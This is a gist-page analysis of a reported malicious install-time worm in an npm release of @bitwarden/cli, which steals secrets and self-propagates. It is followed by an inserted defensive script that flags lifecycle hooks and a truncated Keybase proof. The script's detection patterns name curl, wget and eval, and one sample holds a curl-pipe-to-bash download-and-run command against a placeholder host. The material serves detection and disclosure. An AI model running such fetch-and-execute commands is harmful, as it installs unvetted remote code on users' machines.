gigabit / 2026.4.0-bw1-public-gist.md
Created April 23, 2026 15:45 — forked from N3mes1s/2026.4.0-bw1-public-gist.md
@bitwarden/cli@2026.4.0 bw1.js supply-chain worm analysis

@bitwarden/cli@2026.4.0 - bw1.js Supply-Chain Worm Analysis

Date: 2026-04-23

Analysis

The npm package @bitwarden/cli@2026.4.0 contains a malicious install-time payload. The package adds a preinstall hook that runs a Node bootstrapper, downloads Bun if needed, then executes a large obfuscated Bun bundle named bw1.js.

This is a full supply-chain worm and secret exfiltration agent. It harvests local secrets, CI secrets, GitHub repository secrets, and cloud secret stores, then exfiltrates encrypted results and uses stolen npm tokens to publish infected package updates.
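The install-time vector described above (a lifecycle hook that runs a Node bootstrapper which then fetches Bun and executes a bundle) is the part a defender can check for before anything runs. The following is an added example, not code from this gist, from Bitwarden or from the malicious package: it audits the `scripts` block of a package.json for lifecycle hooks and flags the indicators a reviewer would want surfaced. Function names, indicator regexes and the sample packages are this example's own constructions.

```javascript
// Added example (not code from the analysis or the package): flag install-time
// lifecycle scripts in a package.json, the vector the text describes, where a
// preinstall hook runs a Node bootstrapper that fetches Bun and executes a bundle.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Patterns a reviewer wants surfaced in an install-time command. Names and
// regexes are this example's own, not indicators published for bw1.js.
const INDICATORS = [
  { name: "bun-runtime", re: /\bbunx?\b/i },
  { name: "remote-fetch", re: /\b(curl|wget)\b|https?:\/\//i },
  { name: "node-bootstrapper", re: /\bnode\s+\S+\.(m?js|cjs)\b/ },
  { name: "decode-or-eval", re: /\b(base64|eval|atob)\b/i },
];

// Returns one finding per lifecycle hook present, with the matched indicator names.
function auditLifecycleScripts(pkg) {
  const scripts = (pkg && typeof pkg.scripts === "object" && pkg.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== "string") continue;
    const indicators = INDICATORS.filter((i) => i.re.test(command)).map((i) => i.name);
    const severity = indicators.length >= 2 ? "high" : indicators.length === 1 ? "medium" : "low";
    findings.push({ hook, command, indicators, severity });
  }
  return findings;
}

// Highest severity across findings; "none" when the package declares no lifecycle hook.
function riskLevel(pkg) {
  const rank = { none: 0, low: 1, medium: 2, high: 3 };
  return auditLifecycleScripts(pkg).reduce((worst, f) => (rank[f.severity] > rank[worst] ? f.severity : worst), "none");
}

// Constructed samples (file names and the URL are placeholders, not real artefacts).
const stagedPackage = {
  name: "sample-a", version: "0.0.0",
  scripts: { preinstall: "node ./bootstrap.js", test: "jest" },
};
const loudPackage = {
  name: "sample-b", version: "0.0.0",
  scripts: { postinstall: "curl -fsSL https://example.invalid/bun.sh | bash && bun run ./bundle.js" },
};
const cleanPackage = { name: "sample-c", version: "0.0.0", scripts: { build: "tsc" } };

for (const pkg of [stagedPackage, loudPackage, cleanPackage]) {
  console.log(pkg.name, "=>", riskLevel(pkg), JSON.stringify(auditLifecycleScripts(pkg)));
}
```

A quiet `node ./file.js` preinstall, like the staged sample, is exactly the shape that hides a multi-stage bootstrapper, so a medium finding still deserves a manual read of the referenced file; installing with `npm install --ignore-scripts` prevents any lifecycle hook from running while you review.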

Keybase proof

I hereby claim:

  • I am gigabit on github.
  • I am zettaquark (https://keybase.io/zettaquark) on keybase.
  • I have a public key ASAjy8ZpkmU-ppXPQCJWjE6LjPauhgK8Mw9yXHQQ3MnPmwo

To claim this, I am signing this object: